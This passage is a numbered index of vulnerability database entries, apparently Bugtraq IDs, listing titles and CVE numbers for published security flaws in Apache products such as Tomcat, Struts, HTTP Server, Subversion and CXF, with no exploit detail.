14759| [83323] Apache Tomcat CVE-2015-5346 Session Fixation Vulnerability
14760| [83259] Apache Hadoop CVE-2015-1776 Information Disclosure Vulnerability
14761| [83243] Apache Solr CVE-2015-8797 Cross Site Scripting Vulnerability
14762| [83119] Apache Sling CVE-2016-0956 Information Disclosure Vulnerability
14763| [83002] Apache CVE-2000-1205 Cross-Site Scripting Vulnerability
14764| [82871] Apache Ranger Authentication Bypass and Security Bypass Vulnerabilities
14765| [82800] Apache CloudStack CVE-2015-3251 Information Disclosure Vulnerability
14766| [82798] Apache CloudStack CVE-2015-3252 Authentication Bypass Vulnerability
14767| [82732] Apache Gallery CVE-2003-0771 Local Security Vulnerability
14768| [82676] Apache CVE-2003-1581 Cross-Site Scripting Vulnerability
14769| [82550] Apache Struts CVE-2015-5209 Security Bypass Vulnerability
14770| [82300] Apache Subversion CVE-2015-5259 Integer Overflow Vulnerability
14771| [82260] Apache Camel CVE-2015-5344 Remote Code Execution Vulnerability
14772| [82234] Apache Hive CVE-2015-7521 Security Bypass Vulnerability
14773| [82082] Apache CVE-1999-0289 Remote Security Vulnerability
14774| [81821] Apache Distribution for Solaris CVE-2007-2080 SQL-Injection Vulnerability
14775| [80696] Apache Camel CVE-2015-5348 Information Disclosure Vulnerability
14776| [80525] Apache CVE-2003-1580 Remote Security Vulnerability
14777| [80354] Drupal Apache Solr Search Module Access Bypass Vulnerability
14778| [80193] Apache CVE-1999-0107 Denial-Of-Service Vulnerability
14779| [79812] Apache Directory Studio CVE-2015-5349 Command Injection Vulnerability
14780| [79744] Apache HBase CVE-2015-1836 Unauthorized Access Vulnerability
14781| [79204] Apache TomEE 'EjbObjectInputStream' Remote Code Execution Vulnerability
14782| [77679] Apache Cordova For Android CVE-2015-8320 Weak Randomization Security Bypass Vulnerability
14783| [77677] Apache Cordova For Android CVE-2015-5256 Security Bypass Vulnerability
14784| [77591] Apache CXF SAML SSO Processing CVE-2015-5253 Security Bypass Vulnerability
14785| [77521] Apache Commons Collections 'InvokerTransformer.java' Remote Code Execution Vulnerability
14786| [77110] Apache HttpComponents HttpClient CVE-2015-5262 Denial of Service Vulnerability
14787| [77086] Apache Ambari CVE-2015-1775 Server Side Request Forgery Security Bypass Vulnerability
14788| [77085] Apache Ambari CVE-2015-3270 Remote Privilege Escalation Vulnerability
14789| [77082] Apache Ambari 'targetURI' Parameter Open Redirection Vulnerability
14790| [77059] Apache Ambari CVE-2015-3186 Cross Site Scripting Vulnerability
14791| [76933] Apache James Server Unspecified Command Execution Vulnerability
14792| [76832] Apache cordova-plugin-file-transfer CVE-2015-5204 HTTP Header Injection Vulnerability
14793| [76625] Apache Struts CVE-2015-5169 Cross Site Scripting Vulnerability
14794| [76624] Apache Struts CVE-2015-2992 Cross Site Scripting Vulnerability
14795| [76522] Apache Tapestry CVE-2014-1972 Security Bypass Vulnerability
14796| [76486] Apache CXF Fediz CVE-2015-5175 Denial of Service Vulnerability
14797| [76452] Apache ActiveMQ CVE-2015-1830 Directory Traversal Vulnerability
14798| [76446] Apache Subversion 'libsvn_fs_fs/tree.c' Denial of Service Vulnerability
14799| [76274] Apache Subversion CVE-2015-3184 Information Disclosure Vulnerability
14800| [76273] Apache Subversion CVE-2015-3187 Information Disclosure Vulnerability
14801| [76272] Apache ActiveMQ CVE-2014-3576 Denial of Service Vulnerability
14802| [76221] Apache Ranger CVE-2015-0266 Access Bypass Vulnerability
14803| [76208] Apache Ranger CVE-2015-0265 JavaScript Code Injection Vulnerability
14804| [76025] Apache ActiveMQ Artemis CVE-2015-3208 XML External Entity Information Disclosure Vulnerability
14805| [75965] Apache HTTP Server CVE-2015-3185 Security Bypass Vulnerability
14806| [75964] Apache HTTP Server CVE-2015-0253 Remote Denial of Service Vulnerability
14807| [75963] Apache HTTP Server CVE-2015-3183 Security Vulnerability
14808| [75940] Apache Struts CVE-2015-1831 Security Bypass Vulnerability
14809| [75919] Apache Groovy CVE-2015-3253 Remote Code Execution Vulnerability
14810| [75338] Apache Storm CVE-2015-3188 Remote Code Execution Vulnerability
14811| [75275] Drupal Apache Solr Real-Time Module Access Bypass Vulnerability
14812| [74866] Apache Cordova For Android CVE-2015-1835 Security Bypass Vulnerability
14813| [74839] Apache Sling API and Sling Servlets CVE-2015-2944 Cross Site Scripting Vulnerability
14814| [74761] Apache Jackrabbit CVE-2015-1833 XML External Entity Information Disclosure Vulnerability
14815| [74686] Apache Ambari '/var/lib/ambari-server/ambari-env.sh' Local Privilege Escalation Vulnerability
14816| [74665] Apache Tomcat CVE-2014-7810 Security Bypass Vulnerability
14817| [74475] Apache Tomcat CVE-2014-0230 Denial of Service Vulnerability
14818| [74423] Apache Struts CVE-2015-0899 Security Bypass Vulnerability
14819| [74338] Apache OpenOffice HWP Filter Memory Corruption Vulnerability
14820| [74265] Apache Tomcat 'mod_jk' CVE-2014-8111 Information Disclosure Vulnerability
14821| [74260] Apache Subversion CVE-2015-0248 Multiple Denial of Service Vulnerabilities
14822| [74259] Apache Subversion 'deadprops.c' Security Bypass Vulnerability
14823| [74204] PHP 'sapi/apache2handler/sapi_apache2.c' Remote Code Execution Vulnerability
14824| [74158] Apache HTTP Server 'protocol.c' Remote Denial of Service Vulnerability
14825| [73954] Apache Flex 'asdoc/templates/index.html' Cross Site Scripting Vulnerability
14826| [73851] Apache2 CVE-2012-0216 Cross-Site Scripting Vulnerability
14827| [73478] Apache Cassandra CVE-2015-0225 Remote Code Execution Vulnerability
14828| [73041] Apache HTTP Server 'mod_lua' Module Denial of Service Vulnerability
14829| [73040] Apache HTTP Server 'mod_lua.c' Local Access Bypass Vulnerability
14830| [72809] Apache Standard Taglibs CVE-2015-0254 XML External Entity Injection Vulnerability
14831| [72717] Apache Tomcat CVE-2014-0227 Chunk Request Remote Denial Of Service Vulnerability
14832| [72557] Apache WSS4J CVE-2015-0227 Security Bypass Vulnerability
14833| [72553] Apache WSS4J CVE-2015-0226 Information Disclosure Vulnerability
14834| [72513] Apache ActiveMQ CVE-2014-3612 LDAP Authentication Bypass Vulnerability
14835| [72511] Apache ActiveMQ CVE-2014-8110 Multiple Cross Site Scripting Vulnerabilities
14836| [72510] Apache ActiveMQ CVE-2014-3600 XML External Entity Injection Vulnerability
14837| [72508] Apache ActiveMQ Apollo CVE-2014-3579 XML External Entity Injection Vulnerability
14838| [72319] Apache Qpid CVE-2015-0223 Security Bypass Vulnerability
14839| [72317] Apache Qpid CVE-2015-0224 Incomplete Fix Multiple Denial of Service Vulnerabilities
14840| [72115] Apache Santuario 'XML Signature Verification' Security Bypass Vulnerability
14841| [72053] Apache HTTP Server 'mod_remoteip.c' IP Address Spoofing Vulnerability
14842| [72030] Apache Qpid CVE-2015-0203 Multiple Denial of Service Vulnerabilities
14843| [71879] Apache Traffic Server 'HttpTransact.cc' Denial of Service Vulnerability
14844| [71726] Apache Subversion CVE-2014-3580 Remote Denial of Service Vulnerability
14845| [71725] Apache Subversion CVE-2014-8108 Remote Denial of Service Vulnerability
14846| [71657] Apache HTTP Server 'mod_proxy_fcgi' Module Denial of Service Vulnerability
14847| [71656] Apache HTTP Server 'mod_cache' Module Denial of Service Vulnerability
14848| [71548] Apache Struts CVE-2014-7809 Security Bypass Vulnerability
14849| [71466] Apache Hadoop CVE-2014-3627 Information Disclosure Vulnerability
14850| [71353] Apache HTTP Server 'LuaAuthzProvider' Authorization Bypass Vulnerability
14851| [71004] Apache Qpid CVE-2014-3629 XML External Entity Injection Vulnerability
14852| [70970] Apache Traffic Server Cross Site Scripting Vulnerability
14853| [70738] Apache CXF CVE-2014-3584 Denial of Service Vulnerability
14854| [70736] Apache CXF SAML SubjectConfirmation Security Bypass Vulnerability
14855| [69728] Apache Tomcat CVE-2013-4444 Arbitrary File Upload Vulnerability
14856| [69648] Apache POI CVE-2014-3574 Denial Of Service Vulnerability
14857| [69647] Apache POI OpenXML parser CVE-2014-3529 XML External Entity Information Disclosure Vulnerability
14858| [69351] Apache OpenOffice Calc CVE-2014-3524 Command Injection Vulnerability
14859| [69295] Apache Axis Incomplete Fix CVE-2014-3596 SSL Certificate Validation Security Bypass Vulnerability
14860| [69286] Apache OFBiz CVE-2014-0232 Multiple Cross Site Scripting Vulnerabilities
14861| [69258] Apache HttpComponents Incomplete Fix CVE-2014-3577 SSL Validation Security Bypass Vulnerability
14862| [69257] Apache HttpComponents Incomplete Fix SSL Certificate Validation Security Bypass Vulnerability
14863| [69248] Apache HTTP Server CVE-2013-4352 Remote Denial of Service Vulnerability
14864| [69237] Apache Subversion CVE-2014-3522 SSL Certificate Validation Information Disclosure Vulnerability
14865| [69173] Apache Traffic Server CVE-2014-3525 Unspecified Security Vulnerability
14866| [69046] Apache Cordova For Android CVE-2014-3502 Information Disclosure Vulnerability
14867| [69041] Apache Cordova For Android CVE-2014-3501 Security Bypass Vulnerability
14868| [69038] Apache Cordova For Android CVE-2014-3500 Security Bypass Vulnerability
14869| [68995] Apache Subversion CVE-2014-3528 Insecure Authentication Weakness
14870| [68966] Apache Subversion 'irkerbridge.py' Local Privilege Escalation Vulnerability
14871| [68965] Apache Subversion 'svnwcsub.py' Local Privilege Escalation Vulnerability
14872| [68863] Apache HTTP Server 'mod_cache' Module Remote Denial of Service Vulnerability
14873| [68747] Apache HTTP Server CVE-2014-3523 Remote Denial of Service Vulnerability
14874| [68745] Apache HTTP Server CVE-2014-0118 Remote Denial of Service Vulnerability
14875| [68742] Apache HTTP Server CVE-2014-0231 Remote Denial of Service Vulnerability
14876| [68740] Apache HTTP Server CVE-2014-0117 Remote Denial of Service Vulnerability
14877| [68678] Apache HTTP Server 'mod_status' CVE-2014-0226 Remote Code Execution Vulnerability
14878| [68445] Apache CXF UsernameToken Information Disclosure Vulnerability
14879| [68441] Apache CXF SAML Tokens Validation Security Bypass Vulnerability
14880| [68431] Apache Syncope CVE-2014-3503 Insecure Password Generation Weakness
14881| [68229] Apache Harmony PRNG Entropy Weakness
14882| [68111] Apache 'mod_wsgi' Module Privilege Escalation Vulnerability
14883| [68072] Apache Tomcat CVE-2014-0186 Remote Denial of Service Vulnerability
14884| [68039] Apache Hive CVE-2014-0228 Security Bypass Vulnerability
14885| [67673] Apache Tomcat CVE-2014-0095 AJP Request Remote Denial Of Service Vulnerability
14886| [67671] Apache Tomcat CVE-2014-0075 Chunk Request Remote Denial Of Service Vulnerability
14887| [67669] Apache Tomcat CVE-2014-0119 XML External Entity Information Disclosure Vulnerability
14888| [67668] Apache Tomcat CVE-2014-0099 Request Processing Information Disclosure Vulnerability
14889| [67667] Apache Tomcat CVE-2014-0096 XML External Entity Information Disclosure Vulnerability
14890| [67534] Apache 'mod_wsgi' Module CVE-2014-0242 Information Disclosure Vulnerability
14891| [67532] Apache 'mod_wsgi' Module Local Privilege Escalation Vulnerability
14892| [67530] Apache Solr Search Template Cross Site Scripting Vulnerability
14893| [67236] Apache CXF CVE-2014-0109 Remote Denial of Service Vulnerability
14894| [67232] Apache CXF CVE-2014-0110 Denial of Service Vulnerability
14895| [67121] Apache Struts ClassLoader Manipulation CVE-2014-0114 Security Bypass Vulnerability
14896| [67081] Apache Struts 'getClass()' Method Security Bypass Vulnerability
14897| [67064] Apache Struts ClassLoader Manipulation Incomplete Fix Security Bypass Vulnerability
14898| [67013] Apache Zookeeper CVE-2014-0085 Local Information Disclosure Vulnerability
14899| [66998] Apache Archiva CVE-2013-2187 Unspecified Cross Site Scripting Vulnerability
14900| [66991] Apache Archiva CVE-2013-2187 HTML Injection Vulnerability
14901| [66927] Apache Syncope CVE-2014-0111 Remote Code Execution Vulnerability
14902| [66474] Apache CouchDB Universally Unique IDentifier (UUID) Remote Denial of Service Vulnerability
14903| [66397] Apache Xalan-Java Library CVE-2014-0107 Security Bypass Vulnerability
14904| [66303] Apache HTTP Server Multiple Denial of Service Vulnerabilities
14905| [66041] RETIRED: Apache Struts CVE-2014-0094 Classloader Manipulation Security Bypass Vulnerability
14906| [65999] Apache Struts ClassLoader Manipulation CVE-2014-0094 Security Bypass Vulnerability
14907| [65967] Apache Cordova File-Transfer Unspecified Security Vulnerability
14908| [65959] Apache Cordova InAppBrowser Remote Privilege Escalation Vulnerability
14909| [65935] Apache Shiro 'login.jsp' Authentication Bypass Vulnerability
14910| [65902] Apache Camel CVE-2014-0003 Remote Code Execution Vulnerability
14911| [65901] Apache Camel CVE-2014-0002 XML External Entity Information Disclosure Vulnerability
14912| [65773] Apache Tomcat CVE-2013-4286 Security Bypass Vulnerability
14913| [65769] Apache Tomcat CVE-2014-0033 Session Fixation Vulnerability
14914| [65768] Apache Tomcat CVE-2013-4590 XML External Entity Information Disclosure Vulnerability
14915| [65767] Apache Tomcat CVE-2013-4322 Incomplete Fix Denial of Service Vulnerability
14916| [65615] Apache ActiveMQ 'refresh' Parameter Cross Site Scripting Vulnerability
14917| [65434] Apache Subversion 'mod_dav_svn' Module SVNListParentPath Denial of Service Vulnerability
14918| [65431] Apache Wicket CVE-2013-2055 Information Disclosure Vulnerability
14919| [65400] Apache Commons FileUpload CVE-2014-0050 Denial Of Service Vulnerability
14920| [64782] Apache CloudStack Virtual Router Component Security Bypass Vulnerability
14921| [64780] Apache CloudStack Unauthorized Access Vulnerability
14922| [64617] Apache Libcloud Digital Ocean API Local Information Disclosure Vulnerability
14923| [64437] Apache Santuario XML Security For JAVA XML Signature Denial of Service Vulnerability
14924| [64427] Apache Solr Multiple XML External Entity Injection Vulnerabilities
14925| [64009] Apache Solr CVE-2013-6408 XML External Entity Injection Vulnerability
14926| [64008] Apache Solr CVE-2013-6407 XML External Entity Injection Vulnerability
14927| [63981] Apache Subversion 'mod_dav_svn' Module Denial of Service Vulnerability
14928| [63966] Apache Subversion CVE-2013-4505 Security Bypass Vulnerability
14929| [63963] Apache Roller CVE-2013-4171 Cross Site Scripting Vulnerability
14930| [63935] Apache Solr 'SolrResourceLoader' Directory Traversal Vulnerability
14931| [63928] Apache Roller CVE-2013-4212 OGNL Expression Injection Remote Code Execution Vulnerability
14932| [63515] Apache Tomcat Manager Component CVE-2013-6357 Cross Site Request Forgery Vulnerability
14933| [63403] Apache Struts Multiple Cross Site Scripting Vulnerabilities
14934| [63400] Apache 'mod_pagespeed' Module Unspecified Cross Site Scripting Vulnerability
14935| [63260] Apache Shindig CVE-2013-4295 XML External Entity Information Disclosure Vulnerability
14936| [63241] Apache Sling 'AbstractAuthenticationFormServlet' Open Redirection Vulnerability
14937| [63174] Apache Commons FileUpload 'DiskFileItem' Class Null Byte Arbitrary File Write Vulnerability
14938| [62939] Apache 'mod_fcgid' Module CVE-2013-4365 Heap Buffer Overflow Vulnerability
14939| [62903] Apache Sling 'deepGetOrCreateNode()' Function Denial Of Service Vulnerability
14940| [62706] Apache Camel CVE-2013-4330 Information Disclosure Vulnerability
14941| [62677] Apache 'mod_accounting' Module CVE-2013-5697 SQL Injection Vulnerability
14942| [62674] TYPO3 Apache Solr Unspecified Cross Site Scripting and PHP Code Execution Vulnerabilities
14943| [62587] Apache Struts CVE-2013-4316 Remote Code Execution Vulnerability
14944| [62584] Apache Struts CVE-2013-4310 Security Bypass Vulnerability
14945| [62266] Apache Subversion CVE-2013-4277 Insecure Temporary File Creation Vulnerability
14946| [61984] Apache Hadoop RPC Authentication CVE-2013-2192 Man in the Middle Security Bypass Vulnerability
14947| [61981] Apache HBase RPC Authentication Man In The Middle Security Bypass Vulnerability
14948| [61638] Apache CloudStack CVE-2013-2136 Multiple Cross Site Scripting Vulnerabilities
14949| [61454] Apache Subversion CVE-2013-4131 Denial Of Service Vulnerability
14950| [61379] Apache HTTP Server CVE-2013-2249 Unspecified Remote Security Vulnerability
14951| [61370] Apache OFBiz CVE-2013-2317 'View Log' Cross Site Scripting Vulnerability
14952| [61369] Apache OFBiz Nested Expression Remote Code Execution Vulnerability
14953| [61196] Apache Struts CVE-2013-2248 Multiple Open Redirection Vulnerabilities
14954| [61189] Apache Struts CVE-2013-2251 Multiple Remote Command Execution Vulnerabilities
14955| [61129] Apache HTTP Server CVE-2013-1896 Remote Denial of Service Vulnerability
14956| [61030] Apache CXF CVE-2013-2160 Multiple Remote Denial of Service Vulnerabilities
14957| [60875] Apache Geronimo RMI Classloader Security Bypass Vulnerability
14958| [60846] Apache Santuario XML Security for JAVA XML Signature CVE-2013-2172 Security Bypass Vulnerability
14959| [60817] Apache Santuario XML Security for C++ CVE-2013-2210 Heap Buffer Overflow Vulnerability
14960| [60800] Apache Qpid Python Client SSL Certificate Verification Information Disclosure Vulnerability
14961| [60599] Apache Santuario XML Security for C++ CVE-2013-2156 Remote Heap Buffer Overflow Vulnerability
14962| [60595] Apache Santuario XML Security for C++ XML Signature CVE-2013-2155 Denial of Service Vulnerability
14963| [60594] Apache Santuario XML Security for C++ CVE-2013-2154 Stack Buffer Overflow Vulnerability
14964| [60592] Apache Santuario XML Security for C++ XML Signature CVE-2013-2153 Security Bypass Vulnerability
14965| [60534] Apache OpenJPA Object Deserialization Arbitrary File Creation or Overwrite Vulnerability
14966| [60346] Apache Struts CVE-2013-2134 OGNL Expression Injection Vulnerability
14967| [60345] Apache Struts CVE-2013-2135 OGNL Expression Injection Vulnerability
14968| [60267] Apache Subversion CVE-2013-1968 Remote Denial of Service Vulnerability
14969| [60265] Apache Subversion CVE-2013-2088 Command Injection Vulnerability
14970| [60264] Apache Subversion CVE-2013-2112 Remote Denial of Service Vulnerability
14971| [60187] Apache Tomcat DIGEST Authentication CVE-2013-2051 Incomplete Fix Security Weakness
14972| [60186] Apache Tomcat CVE-2013-1976 Insecure Temporary File Handling Vulnerability
14973| [60167] Apache Struts 'includeParams' CVE-2013-2115 Incomplete Fix Security Bypass Vulnerability
14974| [60166] Apache Struts 'includeParams' CVE-2013-1966 Security Bypass Vulnerability
14975| [60082] Apache Struts 'ParameterInterceptor' Class OGNL CVE-2013-1965 Security Bypass Vulnerability
14976| [59826] Apache HTTP Server Terminal Escape Sequence in Logs Command Injection Vulnerability
14977| [59799] Apache Tomcat CVE-2013-2067 Session Fixation Vulnerability
14978| [59798] Apache Tomcat CVE-2013-2071 Information Disclosure Vulnerability
14979| [59797] Apache Tomcat CVE-2012-3544 Denial of Service Vulnerability
14980| [59670] Apache VCL Multiple Input Validation Vulnerabilities
14981| [59464] Apache CloudStack CVE-2013-2758 Hash Information Disclosure Vulnerability
14982| [59463] Apache CloudStack CVE-2013-2756 Authentication Bypass Vulnerability
14983| [59402] Apache ActiveMQ CVE-2013-3060 Information Disclosure and Denial of Service Vulnerability
14984| [59401] Apache ActiveMQ CVE-2012-6551 Denial of Service Vulnerability
14985| [59400] Apache ActiveMQ CVE-2012-6092 Multiple Cross Site Scripting Vulnerabilities
14986| [58898] Apache Subversion CVE-2013-1884 Remote Denial of Service Vulnerability
14987| [58897] Apache Subversion 'mod_dav_svn/lock.c' Remote Denial of Service Vulnerability
14988| [58895] Apache Subversion 'mod_dav_svn' Remote Denial of Service Vulnerability
14989| [58455] Apache Rave User RPC API CVE-2013-1814 Information Disclosure Vulnerability
14990| [58379] Apache Qpid CVE-2012-4446 Authentication Bypass Vulnerability
14991| [58378] Apache Qpid CVE-2012-4460 Denial of Service Vulnerability
14992| [58376] Apache Qpid CVE-2012-4458 Denial of Service Vulnerability
14993| [58337] Apache Qpid CVE-2012-4459 Denial of Service Vulnerability
14994| [58326] Apache Commons FileUpload CVE-2013-0248 Insecure Temporary File Creation Vulnerability
14995| [58325] Debian Apache HTTP Server CVE-2013-1048 Symlink Attack Local Privilege Escalation Vulnerability
14996| [58323] Apache Subversion 'svn_fs_file_length()' Remote Denial of Service Vulnerability
14997| [58165] Apache HTTP Server Multiple Cross Site Scripting Vulnerabilities
14998| [58136] Apache Maven CVE-2013-0253 SSL Certificate Validation Security Bypass Vulnerability
14999| [58124] Apache Tomcat 'log/logdir' Directory Insecure File Permissions Vulnerability
15000| [58073] Apache Commons HttpClient CVE-2012-5783 SSL Certificate Validation Security Bypass Vulnerability
15001| [57876] Apache CXF WS-SecurityPolicy Authentication Bypass Vulnerability
15002| [57874] Apache CXF CVE-2012-5633 Security Bypass Vulnerability
15003| [57463] Apache OFBiz CVE-2013-0177 Multiple Cross Site Scripting Vulnerabilities
15004| [57425] Apache CXF CVE-2012-5786 SSL Certificate Validation Security Bypass Vulnerability
15005| [57321] Apache CouchDB CVE-2012-5650 Cross Site Scripting Vulnerability
15006| [57314] Apache CouchDB CVE-2012-5649 Remote Code Execution Vulnerability
15007| [57267] Apache Axis2/C SSL Certificate Validation Security Bypass Vulnerability
15008| [57259] Apache CloudStack CVE-2012-5616 Local Information Disclosure Vulnerability
15009| [56814] Apache Tomcat CVE-2012-4431 Cross-Site Request Forgery Vulnerability
15010| [56813] Apache Tomcat CVE-2012-4534 Denial of Service Vulnerability
15011| [56812] Apache Tomcat CVE-2012-3546 Security Bypass Vulnerability
15012| [56753] Apache Apache HTTP Server 'mod_proxy_ajp Module Denial Of Service Vulnerability
15013| [56686] Apache Tomcat CVE-2012-5568 Denial of Service Vulnerability
15014| [56408] Apache Axis and Axis2/Java SSL Certificate Validation Security Bypass Vulnerability
15015| [56403] Apache Tomcat DIGEST Authentication Multiple Security Weaknesses
15016| [56402] Apache Tomcat CVE-2012-2733 Denial of Service Vulnerability
15017| [56171] Apache OFBiz CVE-2012-3506 Unspecified Security Vulnerability
15018| [55876] Apache CloudStack CVE-2012-4501 Security Bypass Vulnerability
15019| [55628] Apache CXF SOAP Action Spoofing Security Bypass Vulnerability
15020| [55608] Apache Qpid (qpidd) Denial of Service Vulnerability
15021| [55536] Apache 'mod_pagespeed' Module Cross Site Scripting and Security Bypass Vulnerabilities
15022| [55508] Apache Axis2 XML Signature Wrapping Security Vulnerability
15023| [55445] Apache Wicket CVE-2012-3373 Cross Site Scripting Vulnerability
15024| [55346] Apache Struts Cross Site Request Forgery and Denial of Service Vulnerabilities
15025| [55290] Drupal Apache Solr Autocomplete Module Cross Site Scripting Vulnerability
15026| [55165] Apache Struts2 Skill Name Remote Code Execution Vulnerability
15027| [55154] Apache 'mod-rpaf' Module Denial of Service Vulnerability
15028| [55131] Apache HTTP Server HTML-Injection And Information Disclosure Vulnerabilities
15029| [54954] Apache QPID NullAuthenticator Authentication Bypass Vulnerability
15030| [54798] Apache Libcloud Man In The Middle Vulnerability
15031| [54358] Apache Hadoop CVE-2012-3376 Information Disclosure Vulnerability
15032| [54341] Apache Sling CVE-2012-2138 Denial Of Service Vulnerability
15033| [54268] Apache Hadoop Symlink Attack Local Privilege Escalation Vulnerability
15034| [54189] Apache Roller Cross Site Request Forgery Vulnerability
15035| [54187] Apache Roller CVE-2012-2381 Cross Site Scripting Vulnerability
15036| [53880] Apache CXF Child Policies Security Bypass Vulnerability
15037| [53877] Apache CXF Elements Validation Security Bypass Vulnerability
15038| [53676] Apache Commons Compress and Apache Ant CVE-2012-2098 Denial Of Service Vulnerability
15039| [53487] Apache POI CVE-2012-0213 Denial Of Service Vulnerability
15040| [53455] PHP 'apache_request_headers()' Function Buffer Overflow Vulnerability
15041| [53305] Apache Qpid CVE-2011-3620 Unauthorized Access Security Bypass Vulnerability
15042| [53046] Apache HTTP Server 'LD_LIBRARY_PATH' Insecure Library Loading Arbitrary Code Execution Vulnerability
15043| [53025] Apache OFBiz Unspecified Remote Code Execution Vulnerability
15044| [53023] Apache OFBiz Multiple Cross Site Scripting Vulnerabilities
15045| [52939] Apache Hadoop CVE-2012-1574 Unspecified User Impersonation Vulnerability
15046| [52702] Apache Struts2 'XSLTResult.java' Remote Arbitrary File Upload Vulnerability
15047| [52696] Apache Traffic Server HTTP Host Header Handling Heap Based Buffer Overflow Vulnerability
15048| [52680] Apache Wicket 'pageMapName' Parameter Cross Site Scripting Vulnerability
15049| [52679] Apache Wicket Hidden Files Information Disclosure Vulnerability
15050| [52565] Apache 'mod_fcgid' Module Denial Of Service Vulnerability
15051| [52146] TYPO3 Apache Solr Extension Unspecified Cross Site Scripting Vulnerability
15052| [51939] Apache MyFaces 'ln' Parameter Information Disclosure Vulnerability
15053| [51917] Apache APR Hash Collision Denial Of Service Vulnerability
15054| [51902] Apache Struts Multiple HTML Injection Vulnerabilities
15055| [51900] Apache Struts CVE-2012-1007 Multiple Cross Site Scripting Vulnerabilities
15056| [51886] Apache CXF UsernameToken Policy Validation Security Bypass Vulnerability
15057| [51869] Apache HTTP Server CVE-2011-3639 'mod_proxy' Reverse Proxy Security Bypass Vulnerability
15058| [51706] Apache HTTP Server 'httpOnly' Cookie Information Disclosure Vulnerability
15059| [51705] Apache HTTP Server CVE-2012-0021 mod_log_config Denial Of Service Vulnerability
15060| [51628] Apache Struts 'ParameterInterceptor' Class OGNL (CVE-2011-3923) Security Bypass Vulnerability
15061| [51447] Apache Tomcat Parameter Handling Denial of Service Vulnerability
15062| [51442] Apache Tomcat Request Object Security Bypass Vulnerability
15063| [51407] Apache HTTP Server Scoreboard Local Security Bypass Vulnerability
15064| [51257] Apache Struts Remote Command Execution and Arbitrary File Overwrite Vulnerabilities
15065| [51238] Apache Geronimo Hash Collision Denial Of Service Vulnerability
15066| [51200] Apache Tomcat Hash Collision Denial Of Service Vulnerability
15067| [50940] Apache Struts Session Tampering Security Bypass Vulnerability
15068| [50912] RETIRED: Apache MyFaces CVE-2011-4343 Information Disclosure Vulnerability
15069| [50904] Apache ActiveMQ Failover Mechanism Remote Denial Of Service Vulnerability
15070| [50848] Apache MyFaces EL Expression Evaluation Security Bypass Vulnerability
15071| [50802] Apache HTTP Server 'mod_proxy' Reverse Proxy Security Bypass Vulnerability
15072| [50639] Apache HTTP Server 'ap_pregsub()' Function Local Denial of Service Vulnerability
15073| [50603] Apache Tomcat Manager Application Security Bypass Vulnerability
15074| [50494] Apache HTTP Server 'ap_pregsub()' Function Local Privilege Escalation Vulnerability
15075| [49957] Apache HTTP Server 'mod_proxy' Reverse Proxy Information Disclosure Vulnerability
15076| [49762] Apache Tomcat HTTP DIGEST Authentication Multiple Security Weaknesses
15077| [49728] Apache Struts Conversion Error OGNL Expression Evaluation Vulnerability
15078| [49616] Apache HTTP Server CVE-2011-3348 Denial Of Service Vulnerability
15079| [49470] Apache Tomcat CVE-2007-6286 Duplicate Request Processing Security Vulnerability
15080| [49353] Apache Tomcat AJP Protocol Security Bypass Vulnerability
15081| [49303] Apache HTTP Server CVE-2011-3192 Denial Of Service Vulnerability
15082| [49290] Apache Wicket Cross Site Scripting Vulnerability
15083| [49147] Apache Tomcat CVE-2011-2481 Information Disclosure Vulnerability
15084| [49143] Apache Commons Daemon 'jsvc' Information Disclosure Vulnerability
15085| [48667] Apache Tomcat 'sendfile' Request Attributes Information Disclosure Vulnerability
15086| [48653] Apache 'mod_authnz_external' Module SQL Injection Vulnerability
15087| [48611] Apache XML Security for C++ Signature Key Parsing Denial of Service Vulnerability
15088| [48456] Apache Tomcat 'MemoryUserDatabase' Information Disclosure Vulnerability
15089| [48015] Apache Archiva Multiple Cross Site Request Forgery Vulnerabilities
15090| [48011] Apache Archiva Multiple Cross Site Scripting and HTML Injection Vulnerabilities
15091| [47929] Apache APR 'apr_fnmatch.c' Denial of Service Vulnerability
15092| [47890] Apache Struts 'javatemplates' Plugin Multiple Cross Site Scripting Vulnerabilities
15093| [47886] Apache Tomcat SecurityConstraints Security Bypass Vulnerability
15094| [47820] Apache APR 'apr_fnmatch()' Denial of Service Vulnerability
15095| [47784] Apache Struts XWork 's:submit' HTML Tag Cross Site Scripting Vulnerability
15096| [47199] Apache Tomcat HTTP BIO Connector Information Disclosure Vulnerability
15097| [47196] Apache Tomcat Login Constraints Security Bypass Vulnerability
15098| [46974] Apache HttpComponents 'HttpClient' Information Disclosure Vulnerability
15099| [46953] Apache MPM-ITK Module Security Weakness
15100| [46734] Subversion 'mod_dav_svn' Apache Server NULL Pointer Dereference Denial Of Service Vulnerability
15101| [46685] Apache Tomcat '@ServletSecurity' Annotations Security Bypass Vulnerability
15102| [46311] Apache Continuum and Archiva Cross Site Scripting Vulnerability
15103| [46177] Apache Tomcat SecurityManager Security Bypass Vulnerability
15104| [46174] Apache Tomcat HTML Manager Interface HTML Injection Vulnerability
15105| [46166] Apache Tomcat JVM Denial of Service Vulnerability
15106| [46164] Apache Tomcat NIO Connector Denial of Service Vulnerability
15107| [46066] Apache CouchDB Web Administration Interface Cross Site Scripting Vulnerability
15108| [45655] Apache Subversion Server Component Multiple Remote Denial Of Service Vulnerabilities
15109| [45123] Awstats Apache Tomcat Configuration File Remote Arbitrary Command Execution Vulnerability
15110| [45095] Apache Archiva Cross Site Request Forgery Vulnerability
15111| [45015] Apache Tomcat 'sort' and 'orderBy' Parameters Cross Site Scripting Vulnerabilities
15112| [44900] Apache 'mod_fcgid' Module Unspecified Stack Buffer Overflow Vulnerability
15113| [44616] Apache Shiro Directory Traversal Vulnerability
15114| [44355] Apache MyFaces Encrypted View State Oracle Padding Security Vulnerability
15115| [44068] Apache::AuthenHook Local Information Disclosure Vulnerability
15116| [43862] Apache QPID SSL Connection Denial of Service Vulnerability
15117| [43673] Apache APR-util 'apr_brigade_split_line()' Denial of Service Vulnerability
15118| [43637] Apache XML-RPC SAX Parser Information Disclosure Vulnerability
15119| [43111] Apache Traffic Server Remote DNS Cache Poisoning Vulnerability
15120| [42637] Apache Derby 'BUILTIN' Authentication Insecure Password Hashing Vulnerability
15121| [42501] Apache CouchDB Cross Site Request Forgery Vulnerability
15122| [42492] Apache CXF XML DTD Processing Security Vulnerability
15123| [42121] Apache SLMS Insufficient Quoting Cross Site Request Forgery Vulnerability
15124| [42102] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability
15125| [41963] Apache HTTP Server Multiple Remote Denial of Service Vulnerabilities
15126| [41544] Apache Tomcat 'Transfer-Encoding' Information Disclosure and Denial Of Service Vulnerabilities
